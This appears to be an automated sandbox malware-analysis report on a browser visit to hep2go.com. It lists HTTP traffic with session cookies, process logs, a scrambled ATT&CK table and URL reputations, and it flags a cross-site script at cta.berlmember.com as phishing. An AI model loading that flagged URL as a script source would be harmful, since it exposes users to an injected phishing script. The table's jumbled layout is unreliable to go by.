Source: global trafficHTTP traffic detected: GET /images/medium-logos/2022-logo-blue-medium.png HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/sign-up.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/arrow_down2.gif HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /javascript/scripts.002.js?rnd=733704651 HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/medium-logos/2022-logo-blue-medium.png HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/arrow_down2.gif HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /ajax/logout_get_id.php?userRef=gciaake HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/login.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /ajax/ur_get_user_name.php HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/sign-up.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /images/login.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /buttons/left_buttons/pend_over.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /buttons/left_buttons/pend_over.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /ajax/get_users.php HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficDNS traffic detected: DNS query: hep2go.com
Source: global trafficDNS traffic detected: DNS query: www.hep2go.com
Source: global trafficDNS traffic detected: DNS query: cta.berlmember.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknownHTTP traffic detected: POST /ajax/ur_get_user_name.php HTTP/1.1Host: www.hep2go.comConnection: keep-aliveContent-Length: 15sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.hep2go.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 15:40:57 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58134
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal56.win@18/24@15/175
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hep2go.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder		1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection		1
Obfuscated Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
http://hep2go.com0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://www.hep2go.com/include/obj.js0%Avira URL Cloudsafe
https://www.hep2go.com/javascript/jquery-1.11.3.min.js0%Avira URL Cloudsafe
https://www.hep2go.com/images/try-it-out-over-3.jpg0%Avira URL Cloudsafe
http://hep2go.com/0%Avira URL Cloudsafe
https://www.hep2go.com/ajax/ur_get_user_name.php0%Avira URL Cloudsafe
https://www.hep2go.com/ajax/logout_get_id.php?userRef=gciaake0%Avira URL Cloudsafe
https://www.hep2go.com/javascript/scripts.002.js0%Avira URL Cloudsafe
https://www.hep2go.com/favicon.ico0%Avira URL Cloudsafe
https://www.hep2go.com/images/progress.gif0%Avira URL Cloudsafe
https://www.hep2go.com/images/log-in-index.jpg0%Avira URL Cloudsafe
https://www.hep2go.com/javascript/user_ref.001.js0%Avira URL Cloudsafe
https://www.hep2go.com/javascript/cart.001.js0%Avira URL Cloudsafe
https://cta.berlmember.com/google/jquery.php100%Avira URL Cloudphishing
https://www.hep2go.com/images/sign-up-index.jpg0%Avira URL Cloudsafe
https://www.hep2go.com/images/arrow_down2.gif0%Avira URL Cloudsafe
https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.png0%Avira URL Cloudsafe
https://www.hep2go.com/buttons/left_buttons/pend_over.jpg0%Avira URL Cloudsafe
https://www.hep2go.com/javascript/scripts.002.js?rnd=7337046510%Avira URL Cloudsafe
https://www.hep2go.com/images/sign-up.jpg0%Avira URL Cloudsafe
https://www.hep2go.com/images/login.jpg0%Avira URL Cloudsafe
https://www.hep2go.com/ajax/get_users.php0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.74.196
truefalse
    		high
    cta.berlmember.com
    		103.52.144.214
    		truefalse
      		high
      hep2go.com
      		174.138.160.75
      		truefalse
        		high
        www.hep2go.com
        		unknown
        		unknownfalse
          		high
          198.187.3.20.in-addr.arpa
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://www.hep2go.com/javascript/scripts.002.jsfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.hep2go.com/include/obj.jsfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.hep2go.com/images/arrow_down2.giffalse
            • Avira URL Cloud: safe
            		unknown
            https://www.hep2go.com/ajax/logout_get_id.php?userRef=gciaakefalse
            • Avira URL Cloud: safe
            		unknown
            https://www.hep2go.com/false
              		unknown
              http://hep2go.com/false
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/javascript/jquery-1.11.3.min.jsfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/images/progress.giffalse
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.pngfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/images/try-it-out-over-3.jpgfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/buttons/left_buttons/pend_over.jpgfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.hep2go.com/log-in-2.php?userRef=gciaakefalse
                		unknown
